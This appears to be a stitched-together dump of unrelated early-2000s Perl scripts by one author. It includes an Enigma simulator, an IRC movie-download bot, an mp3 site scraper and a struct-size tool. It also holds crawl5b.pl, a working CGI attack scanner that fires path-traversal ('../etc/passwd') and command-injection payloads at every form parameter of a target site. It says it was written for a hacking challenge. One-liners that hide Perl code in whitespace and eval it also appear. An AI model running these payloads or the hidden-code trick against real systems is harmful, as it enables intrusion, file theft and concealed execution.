- V,xb25,_;Q=73;Y=256|(ord$b[4])<<9|ord$b[3];X=X>>8^(K=(Z=255)&(X>>12^X>>
- 4^X^X/8))<<17,Y=Y>>8^(Z&(L=(W=Y>>14&7^Y)^W*8^W<<6))<<9,_=(map{_%16orZ^=J
- ^=(O=(11,10,116,100,11,122,20,100)[_/16%8])&110;Z^=(72,@z=(64,72,P^=12*
- (_%16-2?0:O&17)),Q^=_%64?12:0,@z)[_%8]}(16..271))[_]^((M>>=8)+=K+(~L&Z)
- )for@a[128..$#a]}print+x"C*",@a}';s/x/pack+/g;s/[W-ZJ-MO-Q_]/\$$&/g;eval
- #!/usr/bin/perl
- # 3 rotor German Enigma simulation
- # by samy [CommPort5@LucidX.com]
- @rotors = (
- [ split(//, "ABCDEFGHIJKLMNOPQRSTUVWXYZ") ],
- [ split(//, "EKMFLGDQVZNTOWYHXUSPAIBRCJ") ],
- [ split(//, "AJDKSIRUXBLHWTMCQGZNPYFVOE") ],
- [ split(//, "BDFHJLCPRTXVZNYEIWGAKMUSQO") ],
- [ split(//, "ESOVPZJAYQUIRHXLNFTGKDCMWB") ],
- [ split(//, "VZBRGITYUPSDNHLXAWMJQOFECK") ]
- );
- @ref = split(//, "YRUHQSLDPXNGOKMIEBFZCWVJAT");
- $flag = 0;
- $n = 0;
- @order = (3, 1, 2);
- @notch = (ints('Q'), ints('E'), ints('V'), ints('J'), ints('Z'));
- @rings = (ints('W'), ints('X'), ints('T'));
- @pos = (ints('A'), ints('W'), ints('E'));
- @plug = (ints('A'), ints('M'), ints('T'), ints('E'));
- sub ints {
- return unpack("C*", $_[0]);
- }
- while (<STDIN>) {
- if ($_ !~ /^\s*\n$/) {
- chomp($tmp = $_);
- foreach (split(//, $tmp)) {
- $ch = uc($_);
- if ($ch !~ /^\w+$/) {
- next;
- }
- $pos[0]++;
- if ($pos[0] > ints 'Z') {
- $pos[0] -= 26;
- }
- if ($flag) {
- $pos[1]++;
- if ($pos[1] > ints 'Z') {
- $pos[1] -= 26;
- }
- $pos[2]++;
- if ($pos[2] > ints 'Z') {
- $pos[2] -= 26;
- }
- $flag = 0;
- }
- if ($pos[0] eq $notch[$order[0] - 1]) {
- $pos[1]++;
- if ($pos[1] > ints 'Z') {
- $pos[1] -= 26;
- }
- if ($pos[1] eq $notch[$order[1] - 1]) {
- $flag = 1;
- }
- }
- for ($i = 0; $plug[$i]; $i += 2) {
- if ($ch eq $plug[$i]) {
- $ch = $plug[$i + 1];
- }
- elsif ($ch eq $plug[$i + 1]) {
- $ch = $plug[$i];
- }
- }
- for ($i = 0; $i < 3; $i++) {
- $ch += $pos[$i] - ints 'A';
- if ($ch > ints 'Z') {
- $ch -= 26;
- }
- $ch -= $rings[$i] - ints 'A';
- if ($ch < ints 'A') {
- $ch += 26;
- }
- $ch = $rotor[$order[$i] - 1][$ch - ints 'A'];
- $ch += $rings[$i] - ints 'A';
- if ($ch > ints 'Z') {
- $ch -= 26;
- }
- $ch -= $pos[$i] - ints 'A';
- if ($ch < ints 'A') {
- $ch += 26;
- }
- }
- $ch = $reg[$ch - ints 'A'];
- for ($i = 3; $i; $i--) {
- $ch += $pos[$i - 1] - ints 'A';
- if ($ch > ints 'Z') {
- $ch -= 26;
- }
- $ch -= $rings[$i - 1] - ints 'A';
- if ($ch < ints 'A') {
- $ch += 26;
- }
- for ($j = 0; $j < 26; $j++) {
- if ($rotor[$order[$i - 1] - 1][$j] eq $ch) {
- last;
- }
- }
- $ch = $j + ints 'A';
- $ch += $rings[$i - 1] - ints 'A';
- if ($ch > ints 'Z') {
- $ch -= 26;
- }
- $ch -= $pos[$i - 1] - ints 'A';
- if ($ch < ints 'A') {
- $ch += 26;
- }
- }
- for ($i = 0; $plug[$i]; $i += 2) {
- if ($ch eq $plug[$i]) {
- $ch = $plug[$i + 1];
- }
- elsif ($ch eq $plug[$i + 1]) {
- $ch = $plug[$i];
- }
- }
- $n++;
- print pack("C*", $ch);
- if ($n % 5 == 0) {
- if ($n % 55 == 0) {
- print "\n";
- }
- else {
- print " ";
- }
- }
- }
- }
- }
- -Samy Kamkar
- Encodes perl code (from file: code) and outputs 'nothing':
- perl -ne 'for(split//){print"\t"x(ord()/50)." "x(ord()%50)."\n"}' code > new
- re-golfed 10/26/04:
- perl -nle'print"\t"x(ord()/50).$"x(ord()%50)for/(.)/g' code > new
- Decodes 'nothing' (from file: new) and evaluates it:
- perl -e 'open_;$f.=chr s/ //g+s/\t//g*50while<>;eval$f' new
- Example:
- bash# cat code
- print "yo\n";
- bash# perl -ne 'for(split//){print"\t"x(ord()/50)." "x(ord()%50)."\n"}' code > new
- bash# cat new
- bash# perl -e 'open_;$f.=chr s/ //g+s/\t//g*50while<>;eval$f' new
- yo
- bash#
- #!/usr/bin/perl
- use Socket;
- die "usage: $0 <irc server[:port]> <nick> <channel> <'movie'>\n" unless @ARGV == 4;
- use strict;
- my $timeout = 30; # 30
- my $maxbytes = 1; # 4096
- my $nickserv = 1;
- my $debug = 1;
- my $server = shift;
- my $botnick = shift;
- my $channel = "#" . shift;
- my $movie = shift;
- my $password = "hax0rm3";
- my $nickservp = "h4wh4wh4w";
- my $port = 6667;
- my %nicks = ();
- my $fork;
- $port = $1 if $server =~ s/:(.*)$//;
- ($fork = fork()) && die "$0: bot active on process $fork\n" unless $debug;
- while (1) {
- socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname("tcp")) || die "Cannot create socket\n";
- connect(SOCK, sockaddr_in($port, inet_aton($server))) || die "Unable to connect\n";
- select(SOCK);
- $| = 1;
- select(STDOUT);
- print SOCK "USER $botnick $botnick $botnick :h4w h4w h4w\n";
- print SOCK "NICK $botnick\n";
- sleep 2;
- print SOCK "NICKSERV IDENTIFY $nickservp\n" if $nickserv;
- while (<SOCK>) {
- print if /^ERROR\s+/;
- if (/^PING(.*)$/) {
- print SOCK "PONG$1\n";
- next;
- }
- my ($rnick, $rwhat, $rwhere, $rdata) = $_ =~ /^:(\S+)\s+(\S+)\s+(\S+)\s+:?(.*)$/;
- $rnick =~ s/\!([^@]+)\@(.*)$//;
- my ($rident, $rhost) = ($1, $2);
- $rdata =~ s/\x03\d\d?//g; # strip all colors out
- $rdata =~ s/[^\x20-\x7e]//g; # strip all lame characters out
- if ($rwhat eq "002") {
- print SOCK "JOIN $channel\n";
- }
- elsif ($rwhat eq "366") {
- print "$channel: joined - searching for `$movie`\n" if $debug;
- print SOCK "PRIVMSG $channel :\@find $movie\n";
- }
- elsif ($rwhat eq "PRIVMSG") {
- if ($rdata =~ /^\caPING\s+(.*)$/) {
- print SOCK "NOTICE $rnick :\caPING $1\n";
- }
- elsif ($rwhere !~ /^#/) { # private messages
- if ($rdata =~ /^pass $password (.*)$/i) {
- print SOCK "$1\n";
- }
- elsif ($rdata =~ /^die $password/i) {
- close(SOCK);
- exit;
- }
- elsif ($rdata =~ /Trigger:\s*\/ctcp\s+(\S+)\s+(.*?)\] /) {
- $nicks{$1}[0] = $2;
- print "$rnick: recieved trigger\n" if $debug == 2;
- }
- elsif ($rdata =~ /Filename:\s*(.*?)\] (?:\s*\[Directory:\s*(.*?)\] )?/) {
- $nicks{$rnick}[2] = $1;
- $nicks{$rnick}[1] = $2;
- $nicks{$rnick}[1] =~ s/^Drive\s*\d*[\\\/]//i;
- $nicks{$rnick}[1] =~ s/^Root Dir[\\\/]//i;
- print SOCK "PRIVMSG $rnick :\cA$nicks{$rnick}[0]\cA\n";
- print "$rnick: sending DCC chat request\n" if $debug == 2;
- sleep 2; # to avoid server flood protection
- }
- elsif ($rdata =~ /^DCC\s+CHAT\s+chat\s+(\S+)\s+(\S+)/i) {
- fork() || &dccchat($1, $2, $nicks{$rnick}[1], $nicks{$rnick}[2], $rnick);
- }
- elsif ($rdata =~ /^DCC\s+SEND\s+(.*)\s+(\S+)\s+(\S+)\s+(\S+)\s*$/i) {
- $nicks{$rnick}[3] = $2;
- $nicks{$rnick}[4] = $4;
- $nicks{$rnick}[5] = $1;
- &dcccheck(\*SOCK, $1, $2, $3, $4, $rnick)
- }
- elsif ($rdata =~ /^DCC\s+ACCEPT\s+(.*)\s+(\S+)\s+(\S+)\s*$/i) {
- fork() || &dccsend($nicks{$rnick}[5], $nicks{$rnick}[3], $2, $nicks{$rnick}[4], $rnick, $3);
- }
- }
- }
- }
- }
- sub dccchat {
- my ($ip, $port, $dir, $movie, $nick) = @_;
- socket(DCCSOCK, PF_INET, SOCK_STREAM, getprotobyname("tcp")) || die "Cannot create socket\n";
- connect(DCCSOCK, sockaddr_in($port, pack("N", $ip))) || die "Unable to connect\n";
- select(DCCSOCK);
- $| = 1;
- select(STDOUT);
- print "$nick: DCC chat accepted\n" if $debug;
- sleep 2;
- print DCCSOCK "cd $dir\n" if $dir;
- print DCCSOCK "get $movie\n";
- while (<DCCSOCK>) {
- if (/Sorry/) {
- sleep 20;
- print DCCSOCK "get $movie\n";
- }
- elsif (/Now sending|Inserting you in/) {
- last;
- }
- elsif (/Invalid file/) {
- print "$nick: `$movie` not found - disconnecting\n" if $debug;
- exit;
- }
- }
- exit;
- }
- sub dcccheck {
- my ($sock, $movie, $ip, $port, $size, $nick) = @_;
- my $omovie = $movie;
- my $num = 0;
- if (-e $movie && -e "$movie.lock") {
- do { $num++ } while (-e "$movie.$num" && -e "$movie.lock");
- }
- $movie .= ".$num" if $num;
- open(MLOCK, ">$movie.lock");
- close(MLOCK);
- my $trans = (stat($movie))[7];
- if ($trans >= $size) {
- print "$nick: exiting - `$movie`s size is already $trans - downloadable file is $size\n";
- unlink("$movie.lock");
- return ();
- }
- elsif ($trans) {
- print "$nick: resuming `$movie` from $trans ($size bytes total)\n";
- print $sock "PRIVMSG $nick :\cADCC RESUME $omovie $port $trans\cA\n";
- unlink("$movie.lock");
- return ($trans);
- }
- else {
- print "$nick: downloading `$movie` ($size bytes)\n" if $debug;
- fork || &dccsend($movie, $ip, $port, $size, $nick, $trans);
- }
- return ();
- }
- sub dccsend {
- my ($movie, $ip, $port, $size, $nick, $trans) = @_;
- socket(DCCSOCK, PF_INET, SOCK_STREAM, getprotobyname("tcp")) || die "Cannot create socket\n";
- connect(DCCSOCK, sockaddr_in($port, pack("N", $ip))) || die "Unable to connect\n";
- my $old = select(DCCSOCK);
- $| = 1;
- select($old);
- if ($trans) {
- open(MLOCK, ">$movie.lock");
- close(MLOCK);
- }
- open(MOVIE, ">>$movie") || die "Can't open $movie for writing: $!\n";
- my ($data, $bytes);
- while (($bytes, $data) = &getdata(\*DCCSOCK, $maxbytes)) {
- sleep 1;
- if ($bytes) {
- $trans += $bytes;
- print MOVIE $data;
- last unless &senddata(\*DCCSOCK, pack("N", $trans));
- }
- else {
- print "$nick: disconnected from filesend - $trans/$size bytes recieved\n" if $debug;
- open(TEXT, ">>movies.txt");
- print TEXT "$movie :: $trans/$size\n";
- close(TEXT);
- close(MOVIE);
- unlink("$movie.lock");
- exit;
- }
- last if $trans == $size;
- }
- close(MOVIE);
- unlink("$movie.lock");
- open(TEXT, ">>movies.txt");
- print TEXT "$movie :: $trans/$size\n";
- close(TEXT);
- if ($trans != $size) {
- print "$nick: disconnected from filesend - $trans/$size bytes recieved\n" if $debug;
- }
- else {
- print "$nick: recieved `$movie` - $trans/$size bytes recieved\n" if $debug;
- }
- exit;
- }
- sub getdata {
- my ($sock, $bytes) = @_;
- my ($tbytes, $data);
- eval {
- local $SIG{"ALRM"} = sub { die };
- alarm $timeout;
- $tbytes = sysread($sock, $data, $bytes);
- alarm 0;
- };
- if ($@) {
- return ();
- }
- return ($tbytes, $data);
- }
- sub senddata {
- my ($sock, $data) = @_;
- my ($bytes);
- eval {
- local $SIG{"ALRM"} = sub { die };
- alarm $timeout;
- $bytes = syswrite($sock, $data);
- alarm 0;
- };
- if ($@) {
- return ();
- }
- return ($bytes);
- }
- #!/usr/bin/perl
- # recursively suck mp3s from apache-type directory structures
- # v0.21 - [3/4/02]
- #
- # this will only go deeper into directory structures but will
- # never go higher than where it's at, for example:
- # > mp3get blah.com/x/
- # mp3get will suck all .mp3's in /x/ and recursively go into
- # all dirs in blah.com/x/ looking for more mp3s, locally
- # creating the dirs with mp3s in them but it will NEVER go
- # down to ../ (blah.com/) even if there are direct links to
- # it or just a link to "/" so you never end up wasting time
- # like wget makes you :)
- #
- # also it doesn't waste time getting images or anything, only
- # dirs and mp3s (and .ogg's)
- #
- # -samy [cp5@LucidX.com]
- my @requests = ( # when you get mp3s/dirs, the user agent
- # will be randomly chosen from this array
- "User-Agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)",
- "User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)",
- );
- die "usage: $0 [-d (debugging)] <url1> [url2] [url3]..\n" if @ARGV == 0;
- my $debug;
- if ($ARGV[0] eq "-d") {
- shift(@ARGV);
- $debug = 1;
- print STDERR "<Debugging Mode Enabled>\n\n";
- }
- my $urls = @ARGV;
- my $cur;
- my $os;
- if ($^O =~ /Win32/i) {
- $os = "> NUL 2> NUL";
- }
- else {
- $os = "> /dev/null 2> /dev/null";
- }
- $os = " " if $debug;
- $SIG{INT} = sub {
- unlink($cur) if $cur;
- close(CUR);
- die "\nExiting...\n";
- };
- use IO::Socket;
- my @urls;
- for (my $i = 0; $i < $urls; $i++) {
- ($urls[$i][0], $urls[$i][1], $urls[$i][2]) = $ARGV[$i] =~ /^(?:http:\/\/)?([^\/:]+)(?::(\d+))?(\/.*)?$/i;
- $urls[$i][1] = 80 if !$urls[$i][1];
- $urls[$i][2] .= "/" if (!$urls[$i][2] || $urls[$i][2] !~ /\/$/);
- ($urls[$i][3]) = $urls[$i][2] =~ /\/([^\/]*)\/?$/;
- }
- for ($i = 0; $i < $urls; $i++) {
- &recur(@{$urls[$i]});
- }
- sub recur {
- my @addr = @_;
- my $sock = IO::Socket::INET->new(
- PeerAddr => $addr[0],
- PeerPort => $addr[1],
- Timeout => 5,
- Proto => "tcp",
- ) or print STDERR "Can't connect to http://$addr[0]:$addr[1]...moving on\n";
- if ($sock) {
- $addr[2] =~ s/&/&/g;
- print $sock "GET $addr[2] HTTP/1.0\nHost: $addr[0]\nAccept: */*\n"
- . $requests[int(rand(@requests))] . "\n\n";
- my $httpResponse = join('', <$sock>);
- close($sock);
- my (@mp3s, @dirs);
- print "Scanning http://$addr[0]:$addr[1]$addr[2]\n";
- while ($httpResponse =~ s/<a\s+href\s*=\s*(?:"([^"]*)"|'([^']*)'|`([^`]*)`|(\S*))//is) {
- my $tmp = $1;
- if ($tmp =~ /\.ogg|\.mp3|\.m3u$/i) {
- push(@mp3s, $tmp);
- }
- elsif ($tmp =~ /\/$/ && $tmp !~ /^http:\/\/|^\.|^\/|\?/i) {
- push(@dirs, $tmp);
- }
- }
- if (@mp3s) {
- my $temp = $addr[3];
- $addr[3] =~ s/%(.{2})/pack("H2", $1)/eg;
- $addr[3] =~ s/[\?\*:<>|"\\]//g;
- $addr[3] =~ s/\/?$/\//;
- &mkd($addr[3]) unless $addr[3] eq "1";
- $addr[3] =~ s/&/&/g;
- foreach (@mp3s) {
- s/&/&/g;
- s/"/\\"/g;
- my $mp3 = $_;
- $mp3 =~ s/%(.{2})/pack("H2", $1)/eg;
- $mp3 =~ s/[\?\*:<>|"\/\\]//g;
- next if -e $addr[3] . $mp3;
- unlink($addr[3] . $_) if -e $addr[3] . $_;
- print " Getting $addr[3]$mp3\n";
- if ($^O !~ /Win32/i) {
- print " http://$addr[0]:$addr[1]$addr[2]$_\n";
- }
- $cur = $addr[3] . $_;
- open(CUR, "wget \"--directory-prefix=$addr[3]\" \"http://$addr[0]:$addr[1]$addr[2]$_\" --user-agent=\""
- . $requests[int(rand(@requests))] . "\" --execute=robots=off $os |");
- while (<CUR>) { }
- $cur = "";
- rename($addr[3] . $_, $addr[3] . $mp3);
- }
- }
- foreach (@dirs) {
- my @tmp = @addr;
- $tmp[2] =~ s/\/?$/\/$_/;
- $tmp[3] =~ s/\/?$/\/$_/;
- &recur(@tmp);
- }
- }
- }
- sub mkd {
- my $dr = $_[0];
- if (!-e $dr && $dr ne "") {
- my $t = $dr =~ s/[^\/]*\/$//;
- &mkd($t);
- mkdir($dr, "755");
- print "MKDIR $dr\n" if $debug;
- }
- }
- #!/usr/bin/perl
- #######################################################
- #
- # crawl5b.pl - by Samy Kamkar [CommPort5@LucidX.com]
- # This version includes a status line when not in
- # verbose mode and a few others small things
- #
- # Updated September 14th
- #
- # crawl5b.pl
- # crawls a machine (over http) for all links and forms
- # and attempts to find CGIs on the machine with bugs
- # (exploitable to reading any file on the system)
- #
- # my algorithm can be found at:
- # http://cp5.LucidX.com/5balgo1.html
- # and other algorithms along with similar programs can
- # be found at http://cp5.LucidX.com
- #
- # developed specifically for challenge 5B of Caezar's Challenge
- # check out http://www.caezarschallenge.org (Caezar++)
- #
- $statusbar = 1;
- # a status-bar to show how many pages, CGIs, and bugs were found
- $dats = 1;
- # 1 to exclude the second algorithm (doesn't check for foo|perl -e...)
- # speeds up scan twice as fast and checks for only the more common bug
- # set to 2 to include the second aglorithm ($dat2)
- $dat1 = "../" x 20 . "etc/passwd"; # ../../../../etc/passwd
- $dat2 = 'foo|perl -e \'print"roo";print"t:"\'&&foo'; # may want to add a foo; at the beginning
- $first = "img|a|body|area|frame|meta"; # tags right after a '<'
- $second = "src|href|background|target"; # options in any of the tags in $first
- @ignore = ( # file extensions that will not be an HTML or CGI
- "gif", "jpg", "jpeg", "bmp", "psp", "mov", "txt", "ram", "wmv", "pdf",
- "doc", "xls", "rm", "gz", "tar", "zip", "png", "mpg", "mpeg", "mp3",
- );
- #
- #######################################################
- $SIG{INT} = sub { die "\n" };
- use IO::Socket;
- unless (@ARGV == 1 || @ARGV == 2) {
- die "usage: $0 <http://host[/start/page]> [-v (for verbose)]\n";
- }
- sub colored { return $_[0] }
- eval("use Term::ANSIColor");
- $bugsa = 0;
- $cgisa = 0;
- $pagesa = 0;
- while ($dat1 =~ s/(.)//) {
- $tmp = $1;
- if ($tmp =~ /[\W[^\.\/]]/) {
- $data1 .= "%" . unpack("H*", $tmp);
- }
- else {
- $data1 .= $tmp;
- }
- }
- while ($dat2 =~ s/(.)//) {
- $tmp = $1;
- if ($tmp =~ /\W/) {
- $data2 .= "%" . unpack("H*", $tmp);
- }
- else {
- $data2 .= $tmp;
- }
- }
- $data1 .= "%00";
- $data2 .= "%00";
- ($host, $tmp) = $ARGV[0] =~ /^(?:http:\/\/)?([^\/]+)(\/?.*)$/;
- $ip = &host2ip($host);
- $ign = join('|', @ignore);
- print "Beginning to scan " . colored($host, "bold") . " :: " . colored($ip, "bold") . " for CGI bugs...\n";
- print "Kick back and relax, this will take a while...\n\n";
- if ($ARGV[1] eq '-v') {
- $verbose = 1;
- $statusbar = 0;
- }
- &status if $statusbar;
- if ($tmp) {
- $tmp =~ s/\/$//;
- if ($tmp !~ /^\//) {
- $urls{"/$tmp"} = 1;
- }
- else {
- $urls{$tmp} = 1;
- }
- }
- else {
- $urls{"/"} = 1;
- }
- &recursive(%urls);
- sub recursive {
- %urls = @_;
- foreach $url (keys(%urls)) {
- if ($url =~ /\/$/) {
- $curdir = $url;
- }
- else {
- $url =~ /^(.*\/)[^\/]+$/;
- $curdir = $1;
- }
- $read{$url} = $urls{$url};
- delete $urls{$url};
- $sock = IO::Socket::INET->new(
- PeerAddr => $ip,
- PeerPort => 80,
- Timeout => 10,
- Proto => "tcp"
- ) or die "Can't connect to $ip:80\n";
- $url =~ s/&$//;
- $pagesa++;
- if ($verbose) {
- print "GETing $url\n";
- }
- &status if $statusbar;
- print $sock "GET $url HTTP/1.0\nHost: $host\n\n";
- $response = join('', <$sock>);
- $response =~ s/\n/ /g;
- $response = ">$response";
- @res = split(/>[^<]*</, $response);
- foreach $response (@res) {
- $tmp = "";
- # check for form beginnings
- if ($response =~ /^form.*action\s*=\s*"?'?([^"'\s]+)/i) {
- $form[0] = $1 . "?";
- $form[0] =~ s/^http:\/\/([^\/]+)//i;
- if ($form[0] !~ /^\//) {
- $form[0] = $curdir . $form[0];
- }
- }
- # check for a select
- elsif ($form[0] && $response =~ /select\s+name\s*=\s*"?'?([^"'\s]+)/i) {
- $form[0] .= "$1=";
- $form[2]++;
- }
- # check for normal form inputs
- elsif (
- $form[0] &&
- $response =~
- /(?:type\s*=\s*"?'?([^"'\s]*)"?'?)?.*\s+name\s*=\s*"?'?([^"'\s]+)'?"?\s*(?:value\s*=\s*"?'?([^"'\s]*))?/i
- ) {
- ($type, $name, $value) = ($1, $2, $3);
- $form[0] .= $name . "=" . $value . "&";
- }
- # check for option values for forms
- elsif ($form[0] && $form[2] && $response =~ /option\s+value\s*=\s*"?'?([^"'\s]+)/i) {
- $form[0] .= $1 . "&";
- $form[2] = 0;
- }
- # check for end of forms
- elsif ($form[0] && $response =~ /\/form/i) {
- $form[1]++;
- }
- # check for unwanted tags
- unless ($response =~ /^(?:$first).*(?:$second)\s*=\s*"?'?([^"'\s]+)/i) {
- unless ($form[1]) {
- next;
- }
- else {
- $tmp = $form[0];
- $tmp =~ s/&$//;
- @form = ();
- }
- }
- unless ($tmp) {
- $tmp = $1;
- }
- if ($tmp =~ s/^http:\/\/([^\/]+)//i) {
- $addr = $1;
- }
- else {
- $addr = "";
- }
- if ($tmp !~ /^\//) {
- $tmp = $curdir . $tmp;
- }
- if (
- (
- $addr && !$tmp
- ) ||
- $urls{$tmp} ||
- $read{$tmp} ||
- $tmp =~ /mailto:|#|https:|ftp:|news:/i ||
- (
- $tmp !~ /\?/ &&
- $tmp =~ /(?:$ign)/i
- )
- ) {
- next;
- }
- if ($tmp =~ /\?/) {
- # $read{$tmp} = 1;
- $urls{$tmp} = 1;
- &check($tmp);
- }
- else {
- $urls{$tmp} = 1;
- }
- }
- }
- if (%urls) {
- &recursive(%urls);
- }
- }
- sub host2ip {
- return join(".", unpack("C4", (gethostbyname($_[0]))[4]));
- }
- sub check {
- ($cgi) = @_;
- $cgi =~ s/&$//;
- $cgisa++;
- if ($verbose) {
- print "Attempting to break $cgi\n";
- }
- &status if $statusbar;
- $cgi =~ s/([\+\%\$\@\*\\\|\^\(\[\{\)\]\}])/\\$1/g;
- $origcgi = $cgi;
- $cgi =~ s/^(.*\?)//;
- $cgib = $1;
- if ($cgi !~ /=/) {
- for (1 .. $dats) {
- $origcgi =~ s/\?.*$/?/;
- $origcgi .= ${data . $_};
- $sock = IO::Socket::INET->new(
- PeerAddr => $ip,
- PeerPort => 80,
- Timeout => 10,
- Proto => "tcp"
- );
- print $sock "GET $origcgi HTTP/1.0\nHost: $host\n\n";
- $response = join('', <$sock>);
- $response =~ s/\n//g;
- if ($response =~ /root(?:\:|"|')/ && !$bug{$origcgi}) {
- $bug{$origcgi} = 1;
- if ($statusbar) {
- print "\r";
- }
- $bugsa++;
- print "BUG FOUND - http://$host$origcgi\n";
- }
- }
- }
- else {
- for (1 .. $dats) {
- %info = split(/=|&/, $cgi);
- foreach $key (keys(%info)) {
- $origcgi = $cgib . $cgi;
- $tmp = ${data . $_};
- $origcgi =~ s/((?:\?|&)$key=)$info{$key}/$1$tmp/;
- $sock = IO::Socket::INET->new(
- PeerAddr => $ip,
- PeerPort => 80,
- Timeout => 10,
- Proto => "tcp"
- );
- print $sock "GET $origcgi HTTP/1.0\nHost: $host\n\n";
- $response = join('', <$sock>);
- $response =~ s/\n//g;
- if ($response =~ /root(?:\:|"|')/ && !$bug{$origcgi}) {
- $bug{$origcgi} = 1;
- if ($statusbar) {
- print "\r";
- }
- $bugsa++;
- print "BUG FOUND - http://$host$origcgi\n";
- }
- }
- }
- }
- }
- sub status {
- print STDERR "\r" . " " x (6 - length($pagesa));
- print STDERR colored($pagesa, "bold");
- print STDERR " - pages accessed / " . " " x (5 - length($cgisa));
- print STDERR colored($cgisa, "bold");
- print STDERR " - attempted CGIs to break / " . " " x (5 - length($bugsa));
- print STDERR colored($bugsa, "bold");
- print STDERR " - CGI bugs found";
- }
- END {
- print "\n";
- }
- #!/usr/bin/perl
- use Config;
- die "usage: $0 <header file>\n" unless @ARGV == 1;
- %chars = (
- 'char' => (1 * 1),
- 'double' => ($Config{doublesize} * 1),
- 'int' => ($Config{intsize} * 1),
- 'long' => ($Config{longsize} * 1),
- 'short' => ($Config{shortsize} * 1),
- 'long double' => ($Config{longdblsize} * 1),
- 'long long' => ($Config{longlongsize} * 1),
- 'ptr' => ($Config{ptrsize} * 1),
- '__uint8_t' => (1 * 1),
- '__uint16_t' => (2 * 1),
- '__uint32_t' => (4 * 1),
- '__uint64_t' => (8 * 1),
- 'int8_t' => (1 * 1),
- 'int16_t' => (2 * 1),
- 'int32_t' => (4 * 1),
- 'int64_t' => (8 * 1),
- 'pid_t' => (4 * 1),
- 'caddr_t' => (4 * 1),
- 'sa_family_t' => (1 * 1),
- 'void' => (1 * 1),
- );
- %chars = (
- %chars,
- 'unsigned int' => $chars{int},
- 'unsigned char' => $chars{char},
- 'unsigned long' => $chars{long},
- 'unsigned short' => $chars{short},
- );
- open(TMP, "</usr/include/sys/types.h");
- while (<TMP>) {
- if (/typedef\s+(.+)\s+(\S+);/) {
- ($ele, $key) = ($1, $2);
- if ($ele =~ /struct/) {
- $ele =~ s/\s+/ /g;
- $chars{$key} = \$sizeof{$ele} unless $chars{$key};
- }
- else {
- $chars{$key} = $chars{$ele} unless $chars{$key};
- }
- }
- }
- close(TMP);
- open(FH, "<$ARGV[0]") or die "Can't open file $file: $!\n";
- @tmp = <FH>;
- $file = join('', @tmp);
- foreach (@tmp) {
- if (/typedef\s+(.+)\s+(\S+);/) {
- ($ele, $key) = ($1, $2);
- if ($ele =~ /struct/) {
- $ele =~ s/\s+/ /g;
- $chars{$key} = \$sizeof{$ele} unless $chars{$key};
- }
- else {
- $chars{$key} = $chars{$ele} unless $chars{$key};
- }
- }
- elsif (/include\s+(\S+)/) {
- if ($1 =~ /^<(.*?)>/) {
- open(TMP, "</usr/include/$1");
- while (<TMP>) {
- push(@tmp, $_);
- }
- close(TMP);
- }
- elsif ($1 =~ /^(?:"|')(.*?)(?:"|')/) {
- open(TMP, "</usr/include/$1");
- while (<TMP>) {
- push(@tmp, $_);
- }
- close(TMP);
- }
- }
- }
- while ($file =~ s/(struct\s+(\S+)\s*{[^}]+})//) {
- my %tmph;
- ($tmp, $struct) = ($1, $2);
- $tmp =~ s/\/\*.*?\*\///g;
- while ($tmp =~ s/\n\s*(.+\S+)\s+(\S+);//) {
- my $tmpr;
- ($str, $val) = ($2, $1);
- if ($val =~ /struct/) {
- $val =~ s/\s+/ /g;
- $val =~ s/^(.*?)$/\$sizeof\{'$1'\}/;
- }
- $str =~ s/\[(\d+)\]//;
- $tmpr = $1;
- $str =~ s/\s+.*?$//g;
- $str =~ s/\W+//g;
- unless ($tmpr =~ /^\d+$/) {
- $tmpr = 1;
- }
- $structs{$struct}{$str} = $val . "[$tmpr]";
- }
- }
- foreach $struct (keys(%structs)) {
- my $size;
- foreach $val (keys(%{$structs{$struct}})) {
- $tmp = $structs{$struct}{$val};
- ($vl, $ts) = $tmp =~ /^(.*?)\[(\d+)\]/;
- $size = ($size + ($chars{$vl} * $ts));
- }
- $sizeof{"struct $struct"} = $size;
- }
- foreach $struct (keys(%structs)) {
- my $size;
- foreach $val (keys(%{$structs{$struct}})) {
- if ($structs{$struct}{$val} =~ /struct/) {
- $tmp = $structs{$struct}{$val};
- $tmp =~ s/\$sizeof{'(.*?)'}/$1/g;
- ($vl, $ts) = $tmp =~ /^(.*?)\[(\d+)\]$/;
- $size = ($size + ($sizeof{$vl} * $ts));
- }
- else {
- $tmp = $structs{$struct}{$val};
- ($vl, $ts) = $tmp =~ /^(.*?)\[(\d+)\]$/;
- $size = ($size + ($chars{$vl} * $ts));
- }
- }
- }
- foreach $struct (reverse(keys(%structs))) {
- my $size;
- foreach $val (keys(%{$structs{$struct}})) {
- if ($structs{$struct}{$val} =~ /struct/) {
- $tmp = $structs{$struct}{$val};
- $tmp =~ s/\$sizeof{'(.*?)'}/$1/g;
- ($vl, $ts) = $tmp =~ /^(.*?)\[(\d+)\]$/;
- $size = ($size + ($sizeof{$vl} * $ts));
- }
- else {
- $tmp = $structs{$struct}{$val};
- ($vl, $ts) = $tmp =~ /^(.*?)\[(\d+)\]$/;
- $size = ($size + ($chars{$vl} * $ts));
- }
- }
- print "\$sizeof{'struct $struct'} = $size;\n";
- }
- #!/usr/bin/perl
- #############################################################
- # hybbot 0.8
- # by samy (who else?) CommPort5@LucidX.com
- #
- # hybbot is freely available and covered by the same terms
- # and conditions of Perl itself through the Artistic License
- #############################################################
- # Commands and stuff:
- #
- # all users/channel ops/channel owners:
- # status
- # pass <newpass>
- # chpass <oldpass> <newpass> (not yet)
- # mode <pass> <#chan> <modes>
- # register <#chan> <pass>
- # op <#chan> <pass> [nick]
- # addop <#chan> <pass> <nick>
- # delop <#chan> <pass> <nick> (not yet)
- # invite <#chan> <pass> [nick]
- # addchan <#chan> <pass> [modes] (not yet)
- # delchan <#chan> (not yet)
- # chmodes <#chan> <pass> <modes> (not yet)
- # addaop <#chan> <pass> <nick!ident@host>
- #
- # wanna-bes:
- # <pass> opz0r <#chan> <nick>
- #
- # opers:
- # <pass> rehash
- # <pass> opz0r <#chan> <nicks>
- # <pass> deopz0r <#chan> <nicks>
- # <pass> joinz0r <#chans>
- # <pass> partz0r <#chans>
- #
- # hax0rs:
- # <pass> addjoin <#chan> [modes]
- # <pass> botjoin <botnick> <#chan>
- # <pass> botpart <botnick> <#chan>
- # <pass> botop <botnick> <#chan> <nick>
- # <pass> botdeop <botnick> <#chan> <nick>
- # <pass> addbot <botnick> <flags> <hostname> <ircname>
- # <pass> killbot <botnick> [message]
- # <pass> listbots
- # <pass> massopz0r <#chans> <nick>
